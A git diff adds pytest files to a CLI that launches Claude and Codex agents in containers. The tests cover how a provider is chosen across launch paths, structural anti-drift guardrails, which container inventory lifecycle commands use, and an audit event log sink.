config_provider="claude", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, # <-- always False in wizard + prompt_choice=_noop_prompt, + ) + # workspace_last_used wins + assert result == "codex" + + def test_no_resume_provider_available(self) -> None: + """Wizard flow cannot resume — resume_provider is always None.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider="codex", + connected_provider_ids=("codex",), + allowed_providers=(), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + assert result == "codex" + + def test_wizard_prompts_when_ambiguous(self) -> None: + """Wizard always prompts (never non_interactive) when ambiguous.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + assert result == "claude" # first candidate from KNOWN_PROVIDERS + + def test_wizard_cancel_returns_none(self) -> None: + """Cancelling the prompt in wizard returns None.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=_cancel_prompt, + ) + assert result is None + + +# ───────────────────────────────────────────────────────────────────────────── +# Site 3: worktree_commands.py worktree_create_cmd() — +# uses resolve_active_provider() directly +# ───────────────────────────────────────────────────────────────────────────── + + +class TestWorktreeCommandProviderResolution: + """Characterize worktree_commands.py's provider resolution. + + Key differences from flow.py start(): + - Uses resolve_active_provider() directly instead of choose_start_provider() + - No workspace_last_used lookup + - No connected_provider_ids probing + - No resume_provider + - Now uses shared preflight (collect_launch_readiness + ensure_launch_ready) + - Falls back to 'claude' (hardcoded DEFAULT_PROVIDER) when nothing is set + """ + + def test_cli_flag_wins(self) -> None: + """CLI flag is highest precedence in resolve_active_provider too.""" + result = resolve_active_provider( + cli_flag="codex", + config_provider="claude", + ) + assert result == "codex" + + def test_config_provider_used_when_no_cli_flag(self) -> None: + """Config provider is used when no CLI flag.""" + result = resolve_active_provider( + cli_flag=None, + config_provider="codex", + ) + assert result == "codex" + + def test_defaults_to_claude_when_nothing_set(self) -> None: + """Falls back to 'claude' when nothing is configured — key difference.""" + result = resolve_active_provider( + cli_flag=None, + config_provider=None, + ) + assert result == "claude" + + def test_ask_config_treated_as_none_defaults_claude(self) -> None: + """config_provider='ask' is treated as None, falls to claude default.""" + result = resolve_active_provider( + cli_flag=None, + config_provider="ask", + ) + assert result == "claude" + + def test_no_workspace_last_used_in_worktree_path(self) -> None: + """Worktree site never looks up workspace_last_used — it goes straight + to config or default. This means the worktree can launch a different + provider than what the workspace last used.""" + # In choose_start_provider, workspace_last_used='codex' would win. + # In resolve_active_provider, there's no workspace_last_used at all. + result = resolve_active_provider( + cli_flag=None, + config_provider=None, + ) + assert result == "claude" # default, not workspace_last_used + + def test_no_connected_probing_in_worktree(self) -> None: + """Worktree path never probes auth readiness — it resolves purely + from cli_flag + config_provider + default. No adapter probing.""" + # resolve_active_provider has no connected_provider_ids parameter + result = resolve_active_provider( + cli_flag=None, + config_provider=None, + ) + assert result == "claude" + + def test_unknown_provider_raises_value_error(self) -> None: + """Unknown provider raises ValueError in resolve_active_provider.""" + with pytest.raises(ValueError, match="Unknown provider 'unknown'"): + resolve_active_provider( + cli_flag="unknown", + config_provider=None, + ) + + def test_allowed_providers_check(self) -> None: + """Worktree path skips allowed_providers check — it passes no allowed list. + But resolve_active_provider CAN enforce allowed_providers if passed.""" + from scc_cli.core.errors import ProviderNotAllowedError + + with pytest.raises(ProviderNotAllowedError): + resolve_active_provider( + cli_flag=None, + config_provider=None, + allowed_providers=("codex",), # claude default is blocked + ) + + def test_worktree_site_uses_shared_preflight(self) -> None: + """Document that worktree_create_cmd now uses the shared preflight path + (collect_launch_readiness + ensure_launch_ready) instead of inline + ensure_provider_image / ensure_provider_auth calls.""" + # Verified by source inspection. Both image and auth are handled + # through the unified preflight readiness model. + pass + + +# ───────────────────────────────────────────────────────────────────────────── +# Site 4: orchestrator_handlers.py _handle_worktree_start() — +# choose_start_provider with cli_flag=None, resume_provider=None +# ───────────────────────────────────────────────────────────────────────────── + + +class TestOrchestratorWorktreeStartResolution: + """Characterize _handle_worktree_start()'s provider resolution. + + Uses choose_start_provider just like flow.py, but: + - cli_flag is always None (no CLI flag in dashboard context) + - resume_provider is always None (new start, not resume) + - Always interactive (non_interactive=False) + - Uses shared preflight (collect_launch_readiness + ensure_launch_ready) + - Uses workspace_last_used and connected probing + """ + + def test_workspace_last_used_available(self) -> None: + """Dashboard start uses workspace_last_used (unlike worktree_commands).""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + config_provider="claude", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + assert result == "codex" + + def test_connected_probing_available(self) -> None: + """Dashboard start probes auth readiness (unlike worktree_commands).""" + # When config is 'ask' and only one provider connected, auto-selects + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider="ask", + connected_provider_ids=("codex",), + allowed_providers=(), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + assert result == "codex" + + def test_no_cli_flag_in_dashboard(self) -> None: + """Dashboard has no CLI flag — workspace_last_used is highest auto source.""" + result = choose_start_provider( + cli_flag=None, # always None + resume_provider=None, # always None for fresh start + workspace_last_used="claude", + config_provider="codex", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + assert result == "claude" # workspace_last_used wins + + def test_uses_shared_preflight(self) -> None: + """Document: _handle_worktree_start uses the shared preflight path + (collect_launch_readiness + ensure_launch_ready), same as all other + launch sites.""" + # Verified by source inspection. Uses collect_launch_readiness + + # ensure_launch_ready in the try block. + pass + + +# ───────────────────────────────────────────────────────────────────────────── +# Site 5: orchestrator_handlers.py _handle_session_resume() — +# choose_start_provider with resume_provider=session.provider_id +# ───────────────────────────────────────────────────────────────────────────── + + +class TestOrchestratorSessionResumeResolution: + """Characterize _handle_session_resume()'s provider resolution. + + Uses choose_start_provider with: + - cli_flag=None (no CLI in dashboard) + - resume_provider=session.provider_id (session's stored provider) + - workspace_last_used from workspace_local_config + - Connected probing available + - Always interactive (non_interactive=False) + """ + + def test_resume_provider_from_session(self) -> None: + """Resume provider comes from the session record and takes precedence.""" + result = choose_start_provider( + cli_flag=None, + resume_provider="codex", # from session.provider_id + workspace_last_used="claude", + config_provider="claude", + connected_provider_ids=("claude",), + allowed_providers=(), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + assert result == "codex" + + def test_resume_provider_none_falls_through(self) -> None: + """When session has no provider_id, falls to workspace_last_used.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, # old session without provider_id + workspace_last_used="codex", + config_provider="claude", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + assert result == "codex" + + def test_resume_respects_allowed_providers(self) -> None: + """Resume provider is still blocked by team policy.""" + from scc_cli.core.errors import ProviderNotAllowedError + + with pytest.raises(ProviderNotAllowedError): + choose_start_provider( + cli_flag=None, + resume_provider="claude", + workspace_last_used=None, + config_provider=None, + connected_provider_ids=(), + allowed_providers=("codex",), + non_interactive=False, + prompt_choice=_noop_prompt, + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# _record_session_and_context: WorkContext.provider_id is always None +# ───────────────────────────────────────────────────────────────────────────── + + +class TestRecordSessionAndContextProviderGap: + """Characterize: _record_session_and_context does NOT forward provider_id + to WorkContext, even though it receives provider_id and WorkContext has the field. + + The provider_id IS forwarded to sessions.record_session() but NOT to WorkContext. + This means Quick Resume context entries lose the provider information. + """ + + def test_work_context_provider_id_defaults_to_none(self) -> None: + """WorkContext.provider_id defaults to None when not explicitly set.""" + ctx = WorkContext( + team="myteam", + repo_root=Path("/repo"), + worktree_path=Path("/repo"), + worktree_name="repo", + branch="main", + ) + assert ctx.provider_id is None + + def test_work_context_accepts_provider_id(self) -> None: + """WorkContext CAN hold provider_id — it just isn't set by _record_session_and_context.""" + ctx = WorkContext( + team="myteam", + repo_root=Path("/repo"), + worktree_path=Path("/repo"), + worktree_name="repo", + branch="main", + provider_id="codex", + ) + assert ctx.provider_id == "codex" + + def test_record_session_and_context_threads_provider_to_work_context(self) -> None: + """Prove that _record_session_and_context threads provider_id to WorkContext. + + We mock the dependencies to avoid filesystem side effects. + """ + with ( + patch("scc_cli.commands.launch.flow_session.sessions") as mock_sessions, + patch("scc_cli.commands.launch.flow_session.git") as mock_git, + patch("scc_cli.commands.launch.flow_session.record_context") as mock_record_ctx, + patch("scc_cli.commands.launch.flow_session.config"), + ): + mock_git.get_worktree_main_repo.return_value = Path("/repo") + + from scc_cli.commands.launch.flow_session import _record_session_and_context + + _record_session_and_context( + workspace_path=Path("/repo/wt"), + team="myteam", + session_name="sess1", + current_branch="main", + provider_id="codex", + ) + + # sessions.record_session gets provider_id + mock_sessions.record_session.assert_called_once() + call_kwargs = mock_sessions.record_session.call_args + assert call_kwargs.kwargs.get("provider_id") == "codex" or ( + len(call_kwargs.args) == 0 and call_kwargs[1].get("provider_id") == "codex" + ) + + # record_context now gets a WorkContext WITH provider_id + mock_record_ctx.assert_called_once() + recorded_context: WorkContext = mock_record_ctx.call_args[0][0] + assert recorded_context.provider_id == "codex" + assert recorded_context.team == "myteam" + assert recorded_context.branch == "main" + + +# ───────────────────────────────────────────────────────────────────────────── +# Non-interactive behavior characterization +# ───────────────────────────────────────────────────────────────────────────── + + +class TestNonInteractiveBehavior: + """Characterize what happens when non_interactive=True and provider + resolution is ambiguous across different resolution paths.""" + + def test_choose_start_provider_non_interactive_unambiguous_single_connected(self) -> None: + """Non-interactive succeeds when exactly one provider is connected.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("codex",), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + assert result == "codex" + + def test_choose_start_provider_non_interactive_ambiguous_raises(self) -> None: + """Non-interactive raises when multiple providers available, no preference.""" + from scc_cli.core.errors import ProviderNotReadyError + + with pytest.raises(ProviderNotReadyError, match="Multiple providers"): + choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + + def test_resolve_active_provider_non_interactive_always_resolves(self) -> None: + """resolve_active_provider always returns a value — no ambiguity path. + It defaults to 'claude' when nothing is configured.""" + result = resolve_active_provider( + cli_flag=None, + config_provider=None, + ) + assert result == "claude" + + def test_choose_start_provider_non_interactive_single_allowed(self) -> None: + """Non-interactive succeeds when allowed_providers has exactly one entry.""" + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=(), + allowed_providers=("codex",), + non_interactive=True, + prompt_choice=None, + ) + assert result == "codex" + + +# ───────────────────────────────────────────────────────────────────────────── +# Cross-site divergence characterization +# ───────────────────────────────────────────────────────────────────────────── + + +class TestCrossSiteDivergence: + """Document behavioral differences between the five sites that the + consolidation must reconcile.""" + + def test_worktree_and_flow_diverge_on_no_config(self) -> None: + """With no config at all: worktree defaults to 'claude', + choose_start_provider requires interactive or raises.""" + # Site 3 (worktree): always resolves + wt_result = resolve_active_provider(cli_flag=None, config_provider=None) + assert wt_result == "claude" + + # Site 1 (flow): with non_interactive, would raise if multiple connected + from scc_cli.core.errors import ProviderNotReadyError + + with pytest.raises(ProviderNotReadyError): + choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + + def test_worktree_missing_workspace_last_used(self) -> None: + """Worktree path ignores workspace_last_used entirely. + When workspace was last used with codex, worktree still defaults to claude.""" + # Site 3 cannot see workspace_last_used + wt_result = resolve_active_provider(cli_flag=None, config_provider=None) + assert wt_result == "claude" + + # Sites 1,2,4,5 would pick codex from workspace_last_used + flow_result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) + assert flow_result == "codex" + + def test_resolve_active_provider_has_hardcoded_default(self) -> None: + """resolve_active_provider (used by worktree) has a hardcoded default + of 'claude'. choose_start_provider does NOT have this default.""" + assert resolve_active_provider(cli_flag=None, config_provider=None) == "claude" + + def test_resume_provider_only_available_in_sites_1_and_5(self) -> None: + """Only flow.py start() and _handle_session_resume() can pass resume_provider. + The other three sites hardcode resume_provider=None.""" + # With resume_provider set, it takes precedence over workspace_last_used + result = resolve_provider_preference( + cli_flag=None, + resume_provider="codex", + workspace_last_used="claude", + global_preferred=None, + ) + assert result is not None + assert result.provider_id == "codex" + assert result.source == "resume" + + def test_preference_source_tracking(self) -> None: + """resolve_provider_preference tracks which source won — + useful for the consolidated path to report where the choice came from.""" + explicit = resolve_provider_preference( + cli_flag="codex", + resume_provider=None, + workspace_last_used=None, + global_preferred=None, + ) + assert explicit is not None + assert explicit.source == "explicit" + + workspace = resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + global_preferred=None, + ) + assert workspace is not None + assert workspace.source == "workspace_last_used" + + global_pref = resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + global_preferred="codex", + ) + assert global_pref is not None + assert global_pref.source == "global_preferred" + + def test_ask_suppresses_workspace_last_used(self) -> None: + """When global_preferred is 'ask', workspace_last_used is ALSO suppressed. + The 'ask' sentinel returns None before the workspace_last_used check runs. + This means the operator is always prompted when config is 'ask'.""" + result = resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + global_preferred="ask", + ) + # 'ask' suppresses everything below it — including workspace_last_used + assert result is None + + def test_worktree_ask_defaults_to_claude(self) -> None: + """In worktree path, config_provider='ask' is treated as None, + and falls to hardcoded 'claude' default.""" + result = resolve_active_provider(cli_flag=None, config_provider="ask") + assert result == "claude" diff --git a/tests/test_launch_preflight_guardrail.py b/tests/test_launch_preflight_guardrail.py new file mode 100644 index 0000000..2f96e64 --- /dev/null +++ b/tests/test_launch_preflight_guardrail.py @@ -0,0 +1,296 @@ +"""Structural guardrails for launch preflight consistency (M008-S01). + +Anti-drift tests that prevent inline provider resolution from creeping back +into launch entry-point files that were migrated to the shared preflight module. + +Also verifies single-source-of-truth for provider metadata (image refs, +display names) — catching the exact consistency bug M008 cleaned up. + +Pattern: same AST/tokenize structural scanning approach used by +test_no_claude_constants_in_core.py and test_import_boundaries.py. +""" + +from __future__ import annotations + +import ast +import tokenize +from io import BytesIO +from pathlib import Path + +SRC = Path(__file__).resolve().parents[1] / "src" / "scc_cli" + + +# ───────────────────────────────────────────────────────────────────────────── +# Part 1: Provider resolution anti-drift +# +# flow.py and flow_interactive.py were migrated in T03 to use +# preflight.resolve_launch_provider() instead of inline choose_start_provider / +# resolve_active_provider / _resolve_provider calls. +# +# All five launch sites now use collect_launch_readiness + ensure_launch_ready. +# ensure_provider_image and ensure_provider_auth must not appear in migrated files. +# ───────────────────────────────────────────────────────────────────────────── + +# Functions that must NOT appear as direct calls in migrated files. +# These must go through preflight.resolve_launch_provider() and +# preflight.collect_launch_readiness() + ensure_launch_ready(). +_RESOLUTION_FUNCTIONS = frozenset( + { + "choose_start_provider", + "resolve_active_provider", + "ensure_provider_image", + "ensure_provider_auth", + } +) + +# Files that have been migrated to use preflight for provider resolution. +_MIGRATED_FILES = ( + SRC / "commands" / "launch" / "flow.py", + SRC / "commands" / "launch" / "flow_interactive.py", + SRC / "ui" / "dashboard" / "orchestrator_handlers.py", + SRC / "commands" / "worktree" / "worktree_commands.py", +) + +# preflight.py itself is the one legitimate consumer of choose_start_provider. +_PREFLIGHT_MODULE = SRC / "commands" / "launch" / "preflight.py" + + +def _extract_name_tokens(source_bytes: bytes) -> list[str]: + """Extract all NAME tokens from Python source, ignoring comments/strings.""" + tokens = tokenize.tokenize(BytesIO(source_bytes).readline) + return [tok.string for tok in tokens if tok.type == tokenize.NAME] + + +class TestProviderResolutionAntiDrift: + """Migrated launch files must not call resolution functions directly.""" + + def test_migrated_files_do_not_call_resolution_functions(self) -> None: + """Migrated launch files should not contain direct calls to + choose_start_provider, resolve_active_provider, + ensure_provider_image, or ensure_provider_auth.""" + violations: list[str] = [] + for path in _MIGRATED_FILES: + assert path.exists(), f"Missing migrated file: {path}" + source = path.read_bytes() + names = _extract_name_tokens(source) + for name in names: + if name in _RESOLUTION_FUNCTIONS: + violations.append(f"{path.name}: contains '{name}'") + assert not violations, ( + "Migrated files contain direct resolution/bootstrap calls. " + "Use preflight.resolve_launch_provider() + collect_launch_readiness() " + "+ ensure_launch_ready() instead:\n" + "\n".join(f" - {v}" for v in violations) + ) + + def test_migrated_files_import_from_preflight(self) -> None: + """Each migrated file must import from commands.launch.preflight.""" + for path in _MIGRATED_FILES: + assert path.exists(), f"Missing migrated file: {path}" + source = path.read_text() + assert "preflight" in source, ( + f"{path.name} does not import from preflight module. " + "Launch entry points should use preflight.resolve_launch_provider()." + ) + + def test_preflight_is_sole_wrapper_of_choose_start_provider(self) -> None: + """Only preflight.py may import and call choose_start_provider in + the commands/launch directory (excluding tests). + + Other callers in commands/launch/ should use resolve_launch_provider(). + orchestrator_handlers.py is excluded — it has its own migration timeline. + """ + launch_dir = SRC / "commands" / "launch" + violations: list[str] = [] + for py_file in sorted(launch_dir.glob("*.py")): + if py_file.name.startswith("_") and py_file.name != "__init__.py": + continue + if py_file == _PREFLIGHT_MODULE: + continue # preflight.py is the legitimate wrapper + if py_file.name == "provider_choice.py": + continue # definition site + source = py_file.read_bytes() + names = _extract_name_tokens(source) + if "choose_start_provider" in names: + violations.append(py_file.name) + assert not violations, ( + "Only preflight.py should call choose_start_provider in commands/launch/. " + f"Violations: {violations}" + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# Part 2: Single source of truth for provider metadata +# +# Image refs must come from core/image_contracts.py constants. +# Display names must come from core/provider_registry.py or +# core/provider_resolution.py. +# Adapter modules may duplicate display names (they implement the contract). +# ───────────────────────────────────────────────────────────────────────────── + +# Hardcoded image ref strings that should only appear in canonical locations. +_IMAGE_REF_LITERALS = frozenset( + { + "scc-agent-claude:latest", + "scc-agent-codex:latest", + "scc-agent-claude", + "scc-agent-codex", + } +) + +# Canonical locations where image ref constants may be defined. +_IMAGE_REF_CANONICAL = frozenset( + { + "image_contracts.py", # defines the constants + "provider_registry.py", # imports and uses them in the registry + } +) + +# Canonical locations where display names may be hardcoded. +_DISPLAY_NAME_CANONICAL = frozenset( + { + "provider_resolution.py", # _DISPLAY_NAMES dict + "provider_registry.py", # ProviderRuntimeSpec entries + } +) + +# Adapter modules legitimately duplicate display names (they return them +# from capability_profile and display_name properties). +_DISPLAY_NAME_ADAPTER_ALLOWLIST = frozenset( + { + "claude_agent_provider.py", + "codex_agent_provider.py", + "claude_agent_runner.py", + "codex_agent_runner.py", + } +) + +# Modules that have known, documented provider-specific strings that +# predate the registry centralization. These are tracked for future cleanup. +_DISPLAY_NAME_LEGACY_ALLOWLIST = frozenset( + { + "render.py", # has display_name defaults in function signatures + "sandbox.py", # has display_name defaults in function signatures + } +) + + +def _collect_string_literals(source: str) -> list[str]: + """Extract all string literals from Python source using AST.""" + try: + tree = ast.parse(source) + except SyntaxError: + return [] + literals: list[str] = [] + for node in ast.walk(tree): + if isinstance(node, ast.Constant) and isinstance(node.value, str): + literals.append(node.value) + return literals + + +class TestProviderMetadataSingleSource: + """Provider image refs and display names must come from canonical sources.""" + + def test_image_refs_not_hardcoded_outside_canonical(self) -> None: + """Image ref strings like 'scc-agent-claude:latest' must only appear + in image_contracts.py and provider_registry.py.""" + violations: list[str] = [] + for py_file in sorted(SRC.rglob("*.py")): + if "__pycache__" in str(py_file): + continue + if py_file.name in _IMAGE_REF_CANONICAL: + continue + source = py_file.read_text() + literals = _collect_string_literals(source) + for lit in literals: + if lit in _IMAGE_REF_LITERALS: + rel = py_file.relative_to(SRC) + violations.append(f"{rel}: hardcoded '{lit}'") + assert not violations, ( + "Image ref strings must only be defined in image_contracts.py " + "and consumed via the provider registry. Violations:\n" + + "\n".join(f" - {v}" for v in violations) + ) + + def test_display_names_not_hardcoded_outside_canonical(self) -> None: + """Display name strings ('Claude Code', 'Codex') should only appear + as hardcoded values in the registry, resolution module, and adapters.""" + display_names = {"Claude Code", "Codex"} + allowed_files = ( + _DISPLAY_NAME_CANONICAL + | _DISPLAY_NAME_ADAPTER_ALLOWLIST + | _DISPLAY_NAME_LEGACY_ALLOWLIST + ) + violations: list[str] = [] + for py_file in sorted(SRC.rglob("*.py")): + if "__pycache__" in str(py_file): + continue + if py_file.name in allowed_files: + continue + # Skip __init__.py re-exports and test files + if py_file.name == "__init__.py": + continue + source = py_file.read_text() + literals = _collect_string_literals(source) + for lit in literals: + if lit in display_names: + rel = py_file.relative_to(SRC) + violations.append(f"{rel}: hardcoded '{lit}'") + assert not violations, ( + "Display name strings must come from the provider registry or " + "resolution module. Adapter modules may duplicate them. Violations:\n" + + "\n".join(f" - {v}" for v in violations) + ) + + def test_provider_registry_keys_match_dispatch(self) -> None: + """PROVIDER_REGISTRY and _PROVIDER_DISPATCH must cover the same providers.""" + from scc_cli.commands.launch.dependencies import _PROVIDER_DISPATCH + from scc_cli.core.provider_registry import PROVIDER_REGISTRY + + registry_keys = set(PROVIDER_REGISTRY.keys()) + dispatch_keys = set(_PROVIDER_DISPATCH.keys()) + assert registry_keys == dispatch_keys, ( + f"Provider registry keys {registry_keys} differ from " + f"dispatch table keys {dispatch_keys}. " + "Both must cover the same set of known providers." + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# Part 3: preflight.py architecture guard (D046) +# ───────────────────────────────────────────────────────────────────────────── + +# Allowed core/ imports at the top-level of preflight.py (types and errors only). +_ALLOWED_CORE_TOP_LEVEL = frozenset( + { + "scc_cli.core.contracts", + "scc_cli.core.errors", + } +) + + +class TestPreflightArchitectureGuard: + """preflight.py must not import core/ modules at top-level except types/errors.""" + + def test_preflight_top_level_core_imports(self) -> None: + """D046: preflight.py command-layer module must not depend on core/ + logic at the top level. Only types (contracts) and errors are allowed. + Deferred (function-level) imports are fine for runtime dispatch.""" + source = _PREFLIGHT_MODULE.read_text() + tree = ast.parse(source) + + violations: list[str] = [] + for node in ast.iter_child_nodes(tree): + # Only check top-level imports + if isinstance(node, ast.ImportFrom) and node.module: + if node.module.startswith("scc_cli.core."): + if node.module not in _ALLOWED_CORE_TOP_LEVEL: + names = [a.name for a in node.names] + violations.append( + f"line {node.lineno}: from {node.module} import {', '.join(names)}" + ) + + assert not violations, ( + "preflight.py has top-level imports from core/ that are not types/errors. " + "Move logic imports to function-level (deferred) if needed:\n" + + "\n".join(f" - {v}" for v in violations) + ) diff --git a/tests/test_launch_proxy_env.py b/tests/test_launch_proxy_env.py index ce71c7a..887b8c4 100644 --- a/tests/test_launch_proxy_env.py +++ b/tests/test_launch_proxy_env.py @@ -9,7 +9,7 @@ def test_launch_sandbox_passes_proxy_env(tmp_path: Path, monkeypatch) -> None: workspace = tmp_path / "repo" workspace.mkdir() - org_config = {"defaults": {"network_policy": "corp-proxy-only"}} + org_config = {"defaults": {"network_policy": "web-egress-enforced"}} monkeypatch.setenv("HTTP_PROXY", "http://proxy.example.com:8080") diff --git a/tests/test_lifecycle_inventory_consistency.py b/tests/test_lifecycle_inventory_consistency.py new file mode 100644 index 0000000..bef8032 --- /dev/null +++ b/tests/test_lifecycle_inventory_consistency.py @@ -0,0 +1,140 @@ +"""Guardrail: verify lifecycle command surfaces use consistent SCC inventory sources. + +Active user-facing command surfaces (list, stop, dashboard) must use the +label-based ``list_scc_containers()`` / ``list_running_scc_containers()`` +inventory, not the image-based ``_list_all_sandbox_containers()`` or +``list_running_sandboxes()`` which include non-SCC Docker Desktop containers. + +``prune_cmd`` and ``cache_cleanup`` intentionally use the broader image-based +inventory because cleanup should catch orphaned Desktop containers too. + +This test prevents regression to the wrong inventory source. +""" + +from __future__ import annotations + +import ast +from pathlib import Path + +ROOT = Path(__file__).resolve().parents[1] +SRC = ROOT / "src" / "scc_cli" + +# Label-based SCC inventory functions (the correct source for active commands) +LABEL_INVENTORY = {"list_scc_containers", "list_running_scc_containers"} + +# Image-based broader inventory (allowed only in cleanup/prune) +IMAGE_INVENTORY = {"_list_all_sandbox_containers", "list_running_sandboxes"} + + +def _collect_called_names(source: str) -> set[str]: + """Return all Name and Attribute nodes that look like function calls.""" + names: set[str] = set() + try: + tree = ast.parse(source) + except SyntaxError: + return names + for node in ast.walk(tree): + if isinstance(node, ast.Call): + if isinstance(node.func, ast.Name): + names.add(node.func.id) + elif isinstance(node.func, ast.Attribute): + names.add(node.func.attr) + return names + + +class TestListCmdUsesLabelInventory: + """scc list must use list_scc_containers (label-based).""" + + def test_list_cmd_calls_label_inventory(self) -> None: + source = (SRC / "commands" / "worktree" / "container_commands.py").read_text() + # Extract just the list_cmd function body + tree = ast.parse(source) + for node in ast.walk(tree): + if isinstance(node, ast.FunctionDef) and node.name == "list_cmd": + func_source = ast.get_source_segment(source, node) + assert func_source is not None + names = _collect_called_names(func_source) + assert names & LABEL_INVENTORY, ( + "list_cmd should call list_scc_containers or list_running_scc_containers" + ) + assert not (names & IMAGE_INVENTORY), ( + "list_cmd must not use image-based inventory (_list_all_sandbox_containers)" + ) + return + raise AssertionError("list_cmd function not found in container_commands.py") + + +class TestStopCmdUsesLabelInventory: + """scc stop must use list_running_scc_containers (label-based).""" + + def test_stop_cmd_calls_label_inventory(self) -> None: + source = (SRC / "commands" / "worktree" / "container_commands.py").read_text() + tree = ast.parse(source) + for node in ast.walk(tree): + if isinstance(node, ast.FunctionDef) and node.name == "stop_cmd": + func_source = ast.get_source_segment(source, node) + assert func_source is not None + names = _collect_called_names(func_source) + assert names & LABEL_INVENTORY, ( + "stop_cmd should call list_scc_containers or list_running_scc_containers" + ) + assert not (names & IMAGE_INVENTORY), "stop_cmd must not use image-based inventory" + return + raise AssertionError("stop_cmd function not found in container_commands.py") + + +class TestDashboardUsesLabelInventory: + """Dashboard container loaders must use list_scc_containers.""" + + def test_dashboard_status_loader(self) -> None: + source = (SRC / "application" / "dashboard_loaders.py").read_text() + names = _collect_called_names(source) + assert "list_scc_containers" in names, "dashboard_loaders must call list_scc_containers" + assert not (names & IMAGE_INVENTORY), "dashboard_loaders must not use image-based inventory" + + +class TestPickerUsesLabelInventory: + """UI picker for containers must use list_scc_containers.""" + + def test_picker_calls_label_inventory(self) -> None: + source = (SRC / "ui" / "picker.py").read_text() + names = _collect_called_names(source) + assert "list_scc_containers" in names, ( + "picker.py must call list_scc_containers for container selection" + ) + assert not (names & IMAGE_INVENTORY), "picker.py must not use image-based inventory" + + +class TestPruneCmdUsesImageInventory: + """prune_cmd intentionally uses broader image-based inventory for cleanup.""" + + def test_prune_cmd_uses_image_inventory(self) -> None: + source = (SRC / "commands" / "worktree" / "container_commands.py").read_text() + tree = ast.parse(source) + for node in ast.walk(tree): + if isinstance(node, ast.FunctionDef) and node.name == "prune_cmd": + func_source = ast.get_source_segment(source, node) + assert func_source is not None + names = _collect_called_names(func_source) + assert "_list_all_sandbox_containers" in names, ( + "prune_cmd should use _list_all_sandbox_containers for broad cleanup" + ) + return + raise AssertionError("prune_cmd function not found in container_commands.py") + + +class TestLabelFilterExcludesNonSCC: + """list_scc_containers uses label filter that excludes non-SCC containers.""" + + def test_label_filter_uses_scc_managed(self) -> None: + source = (SRC / "docker" / "core.py").read_text() + tree = ast.parse(source) + for node in ast.walk(tree): + if isinstance(node, ast.FunctionDef) and node.name == "list_scc_containers": + func_source = ast.get_source_segment(source, node) + assert func_source is not None + assert "scc" in func_source.lower() and "managed" in func_source.lower(), ( + "list_scc_containers must filter by scc.managed label" + ) + return + raise AssertionError("list_scc_containers function not found in docker/core.py") diff --git a/tests/test_local_audit_event_sink.py b/tests/test_local_audit_event_sink.py new file mode 100644 index 0000000..9694077 --- /dev/null +++ b/tests/test_local_audit_event_sink.py @@ -0,0 +1,82 @@ +from __future__ import annotations + +import json +from datetime import datetime, timezone +from pathlib import Path + +from scc_cli.adapters.local_audit_event_sink import LocalAuditEventSink, serialize_audit_event +from scc_cli.core.contracts import AuditEvent +from scc_cli.core.enums import SeverityLevel + + +def test_serialize_audit_event_emits_canonical_json() -> None: + occurred_at = datetime(2026, 4, 3, tzinfo=timezone.utc) + event = AuditEvent( + event_type="launch.preflight.passed", + message="Launch preflight passed.", + severity=SeverityLevel.INFO, + occurred_at=occurred_at, + subject="claude", + metadata={"network_policy": "open", "required_destination_sets": "anthropic-core"}, + ) + + payload = json.loads(serialize_audit_event(event)) + + assert payload == { + "event_type": "launch.preflight.passed", + "message": "Launch preflight passed.", + "metadata": { + "network_policy": "open", + "required_destination_sets": "anthropic-core", + }, + "occurred_at": occurred_at.isoformat(), + "severity": "info", + "subject": "claude", + } + + +def test_local_audit_event_sink_appends_jsonl_records(tmp_path: Path) -> None: + audit_path = tmp_path / "audit" / "launch-events.jsonl" + sink = LocalAuditEventSink( + audit_path=audit_path, + lock_path=tmp_path / "audit" / "launch-events.lock", + ) + + sink.append( + AuditEvent( + event_type="launch.preflight.passed", + message="Launch preflight passed.", + severity=SeverityLevel.INFO, + subject="claude", + metadata={"network_policy": "open"}, + ) + ) + sink.append( + AuditEvent( + event_type="launch.started", + message="Launch started.", + severity=SeverityLevel.INFO, + subject="claude", + metadata={"sandbox_id": "sandbox-1"}, + ) + ) + + lines = audit_path.read_text(encoding="utf-8").splitlines() + + assert len(lines) == 2 